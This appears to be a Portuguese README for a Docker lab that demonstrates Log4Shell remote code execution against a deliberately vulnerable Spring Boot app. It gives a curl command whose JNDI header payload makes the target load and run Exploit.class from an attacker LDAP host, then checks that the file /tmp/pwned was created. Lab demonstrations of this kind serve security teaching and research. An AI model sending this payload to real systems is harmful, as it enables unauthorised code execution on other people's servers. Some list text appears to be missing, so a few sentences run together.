
Demonstração de exploração RCE baseada em Docker para Log4Shell (CVE-2021-44228) com aplicação Spring Boot vulnerável, servidor LDAP malicioso e entrega de payload via injeção JNDI.
Este projeto simula um cenário de ataque RCE através da vulnerabilidade Log4Shell na biblioteca Apache Log4j 2.
Exploit.class.Requer Docker e Docker Compose instalados.
docker compose up --build
Aguarde até que ambos os contêineres estejam prontos. vulnerable-app estará rodando na porta 8080.
Abra um novo terminal e envie uma requisição contendo o payload JNDI através do cabeçalho X-Api-Version:
curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/Exploit}' http://localhost:8080/
vulnerable-app. Você verá a mensagem do payload registrada.attacker. Você verá a conexão LDAP redirecionada para o servidor HTTP./tmp/pwned foi criado dentro do contêiner vulnerable-app:docker exec -it vulnerable-app ls -la /tmp/pwned
Se o arquivo existir, significa que o código malicioso Exploit.class foi executado com sucesso!
Este projeto é apenas para fins educacionais e de pesquisa em segurança. Não utilize para fins ilegais.